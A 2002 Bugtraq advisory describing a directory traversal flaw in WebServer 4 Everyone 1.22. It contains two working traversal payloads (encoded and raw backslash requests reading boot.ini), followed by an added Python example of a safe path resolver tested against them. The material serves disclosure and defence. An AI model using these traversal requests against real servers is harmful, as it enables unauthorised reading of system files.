Bugtraq mailing list archives

advisory
From: "UkR security team™" <cuctema () ok ru>
Date: Thu, 05 Sep 2002 16:30:30 +0400

 -----------  UkR security team advisory  ------------
     WebServer 4 Everyone directory traversal bug
 -----------------------------------------------------

Name:        WebServer 4 Everyone directory traversal bug
Date:        28.08.2002
Author:      UkR-XblP / UkR security team / http://ust.dp.ua
Application: WebServer 4 Everyone
Version:     1.22
URL:         http://www.freeware.lt/
Risk:        An attacker can view every file on the remote system.
About:       WebServer 4 Everyone is a commercial webserver that runs on
             Win32 systems.
Bug:         The problem is caused by the character '\' (%5c), which is not
             checked as a bad character, so the server follows the path in
             the URI that the attacker gives until it reaches the requested
             file.
Exploits:    http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
             or GET /\..\..\..\..\..\boot.ini HTTP/1.0
             The latter is an HTTP request that can be sent with telnet,
             because some browsers can modify the "\.." chars.

Greetz:     2 Nadya Ostafiychuk - happy birthday !!! ;)
---
Professional hosting for everyone - http://www.host.ru
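
A defender's view of the bug class described in the advisory above, as an added example that is not part of the original advisory or of the WebServer 4 Everyone code: a path check that splits only on '/' passes the backslash form, while a resolver that treats '\' as a separator rejects it. The function names, DOCROOT and the sample request paths other than the two from the advisory are assumptions made for illustration.

```python
import posixpath
from urllib.parse import unquote

DOCROOT = "C:/www/root"  # hypothetical document root (assumption)


def naive_is_safe(raw_path: str) -> bool:
    """Constructed illustration of the flaw: only '/' is treated as a separator."""
    return ".." not in unquote(raw_path).split("/")


def resolve(raw_path: str, docroot: str = DOCROOT):
    """Map a request path to a file under docroot, or return None to reject it."""
    decoded = unquote(raw_path)          # %5c -> '\', %2e -> '.'
    if "\x00" in decoded:
        return None
    # On Win32 both '/' and '\' separate path components, so normalise first.
    segments = decoded.replace("\\", "/").split("/")
    clean = []
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == ".." or ":" in seg:    # parent reference or drive specifier
            return None
        clean.append(seg)
    candidate = posixpath.join(docroot, *clean)
    # Defence in depth: the joined path must still sit under docroot.
    root = posixpath.normpath(docroot)
    if posixpath.commonpath([root, posixpath.normpath(candidate)]) != root:
        return None
    return candidate


if __name__ == "__main__":
    samples = [
        "/docs/index.html",                          # constructed benign request
        "/images%5clogo.gif",                        # constructed benign request
        "/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini",   # from the advisory
        "/\\..\\..\\..\\..\\..\\boot.ini",           # from the advisory
    ]
    for path in samples:
        print(f"{path!r}: naive_ok={naive_is_safe(path)} resolved={resolve(path)}")
```
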

